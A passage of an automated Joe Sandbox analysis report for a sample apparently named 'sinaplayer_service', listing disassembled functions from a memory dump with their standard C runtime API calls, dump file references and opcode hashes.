                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale_dtest$__dscale__fperrraise
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1009800014-0
                                                                                                                                                                                                    • Opcode ID: 7674d4a6b22783cdee9fe4bf6cb86675b33491adb310505b0c49882ad74147f9
                                                                                                                                                                                                    • Instruction ID: 8dfdbd56add2692c3b64353931c0354db4158f130621605f1930bedf978f7e2e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7674d4a6b22783cdee9fe4bf6cb86675b33491adb310505b0c49882ad74147f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85511AE690460F9ACF025ED5D8843EE3F78FB05759F128585E961621C8EBF88A758BC0
                                                                                                                                                                                                    Function 6D0A7893 Relevance: 9.2, APIs: 6, Instructions: 182memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CreateAllocatedNodeData.LIBCMT ref: 6D0A78A7
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A461A
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A462D
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A466B
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: memset.MSVCR120(00000000,00000000,?), ref: 6D0A469C
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 6D0A792E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::DataManager::Resourcememset$AllocatedAllocationCreateGlobalNodeReset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3832299370-0
                                                                                                                                                                                                    • Opcode ID: 5ba2245185b1c115d7de764aee7fb82574760f26232a0778eeb2a0d3bdcf0b35
                                                                                                                                                                                                    • Instruction ID: 99204f6065afc755357204f560757a504970f0396a3f5cdba487810db4ceb6d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ba2245185b1c115d7de764aee7fb82574760f26232a0778eeb2a0d3bdcf0b35
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8851AF70E04209BFEF15DFB8C8407ADB7E6EF89204F15846AE816D7246DB748E418B51
                                                                                                                                                                                                    Function 6D0A8C4C Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6D0A8CAC
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?), ref: 6D0A8CBB
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101), ref: 6D0A8CD3
                                                                                                                                                                                                    • setSBCS.LIBCMT ref: 6D0D75F0
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101,00000000,00000000,00000000), ref: 6D0D7670
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344587817-0
                                                                                                                                                                                                    • Opcode ID: 5304a063798998552b44ce4dd634b4b16f7a678197791232bfc8e917da1e1b23
                                                                                                                                                                                                    • Instruction ID: 36944085379edb413bc12f4fc4e399189de7b528951c11d26e597c6b921b44c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5304a063798998552b44ce4dd634b4b16f7a678197791232bfc8e917da1e1b23
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9510170D043868EFB12CFA9C480BBABBF5AF81304F14856FC5968B192E7B59542CB91
                                                                                                                                                                                                    Function 6D11CB9D Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetTimeFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CC58
                                                                                                                                                                                                    • __crtGetDateFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CC64
                                                                                                                                                                                                    • malloc.MSVCR120(00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCAB
                                                                                                                                                                                                    • __crtGetTimeFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCEE
                                                                                                                                                                                                    • __crtGetDateFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCF5
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000), ref: 6D11CD2A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Format__crt$DateTime$_freea_smalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4257112946-0
                                                                                                                                                                                                    • Opcode ID: fdcd82911e9a1f28a976625504f37756ab1be131954248fddac3400f1af2af56
                                                                                                                                                                                                    • Instruction ID: ec10d49b417c3b7bb9234ec290b6e833dfd1e805c2770684537ed07e8a13762a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdcd82911e9a1f28a976625504f37756ab1be131954248fddac3400f1af2af56
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB516175D1821A8BDB00CFA8C9806EEF7B2FF99710F158079E904AB304E7719D42CBA5
                                                                                                                                                                                                    Function 6D10CF38 Relevance: 9.1, APIs: 6, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF5A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF65
                                                                                                                                                                                                    • _stricmp_l.MSVCR120(00000001,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF7F
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000002,00000002,?,00000002,?,00000001,00000000,00000000,00000000,00000004,00000000,00000000,00000000), ref: 6D10CFC2
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000000,00000002,?,00000002,?,00000001,?,?,?,?,?,00000000,00000000), ref: 6D10D04D
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 6D10D0B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt_errno$_getptd_invalid_parameter_noinfo_stricmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1992914148-0
                                                                                                                                                                                                    • Opcode ID: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction ID: 6e9ff645468c532b8e909cffc12a220b20d93c6c3882b6d7b73e6cf955ddc669
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F518A7090425AABDB02EF94C440FBA77B5EF94314F10C055F9988F1C9CBB6CA42DB91
                                                                                                                                                                                                    Function 6D0A0891 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?), ref: 6D0A0923
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6D0AF7DB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B138C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D587E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 508512864-0
                                                                                                                                                                                                    • Opcode ID: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction ID: 3edbb5d2e8c2141a4a033026fe07fbf86053cfc625f740a5b9eb9c68133e8284
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C41F574B1CB0A9BFB08CFAAC8807BE77E5EF45750B14852DE855C7644E771D9408B41
                                                                                                                                                                                                    Function 6D0F29BE Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCMT ref: 6D0F29E4
                                                                                                                                                                                                      • Part of subcall function 6D0F3D4A: InterlockedPopEntrySList.KERNEL32(?,?,6D0F29E9,00000000,?), ref: 6D0F3D54
                                                                                                                                                                                                      • Part of subcall function 6D0F3D4A: ??2@YAPAXI@Z.MSVCR120(00000010,?,6D0F29E9,00000000,?), ref: 6D0F3D69
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000), ref: 6D0F2AF6
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CEE8,00000000), ref: 6D0F2B0B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base::ChoreConcurrency::details::EntryExceptionInterlockedListRealizedSchedulerThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2878774513-0
                                                                                                                                                                                                    • Opcode ID: cee49b9cf68528763f3de2b8b147f91e49f7ebceede46977f046c5c9cb1d2c82
                                                                                                                                                                                                    • Instruction ID: 5544a5618248aab96dcfe8d6c4a73cd6d624c5d18faa11ae67f717123edc63da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee49b9cf68528763f3de2b8b147f91e49f7ebceede46977f046c5c9cb1d2c82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB41AC31A04202AFEB25DF75C854BEABBB4FF45314F258169DD1A8B252D730D946CF90
                                                                                                                                                                                                    Function 6D0EF939 Relevance: 9.1, APIs: 6, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF944
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF9AB
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF9B5
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EFA1C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCFD8,00000000,6D15CEE8,00000000), ref: 6D0EFA31
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D15CEE8,6D15CEE8,?,?,Function_000DCFD8,00000000,6D15CEE8,00000000), ref: 6D0EFA40
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency@@Manager@1@Resource$??0exception@std@@ExceptionH_prolog3Throwstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1103279269-0
                                                                                                                                                                                                    • Opcode ID: 72451103fd6d90560bff84c3269cf3b99830e68deffa6756a1666ee7b78fdd72
                                                                                                                                                                                                    • Instruction ID: e44ee49d5cc7f9c8ad3a40b686bd89f1b3b419d7a0ced2fc2e4ca11b8bfec1e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72451103fd6d90560bff84c3269cf3b99830e68deffa6756a1666ee7b78fdd72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB315971D04115AFEB00CFAAE8806BEBFF8EFC6384B15806AD994E7201D731D942CB90
                                                                                                                                                                                                    Function 6D0EAD3B Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,00000000,00000070,?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?), ref: 6D0EADB1
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3), ref: 6D0EADC6
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004), ref: 6D0EADCD
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004), ref: 6D0EADFC
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0EAE11
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: 6df72268960ccad1b80b88282353971f00fe4a91772488723b02d53acab7dee3
                                                                                                                                                                                                    • Instruction ID: f740fe24f2aeb22b7759c42c4459b165f9845ada4bda7bdc54310f0158516adc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df72268960ccad1b80b88282353971f00fe4a91772488723b02d53acab7dee3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F316B31205611EFEB19DF19C980EAAB3F9FF8E351720855DE95A8B611DB30F941CBA0
                                                                                                                                                                                                    Function 6D0FACDD Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,00000000,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD53
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD6A
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD71
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FADA0
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0FADB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: 24761d94acf23b920419705c1d5b6c69c6edf66b6db30a06c5f57ec5a07dbd90
                                                                                                                                                                                                    • Instruction ID: b62a31ddf012a7579c8055b61261377d3719e8c1c6073db5ebdfde8b9eb802ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24761d94acf23b920419705c1d5b6c69c6edf66b6db30a06c5f57ec5a07dbd90
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7318C31605615AFEB15DF19C980EAAB3F5FF89321B30855DE95B8B601DB30F942CBA0
                                                                                                                                                                                                    Function 6D0F6326 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32 ref: 6D0F639C
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6D0F63B3
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?), ref: 6D0F63BA
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?), ref: 6D0F63E9
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0F63FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
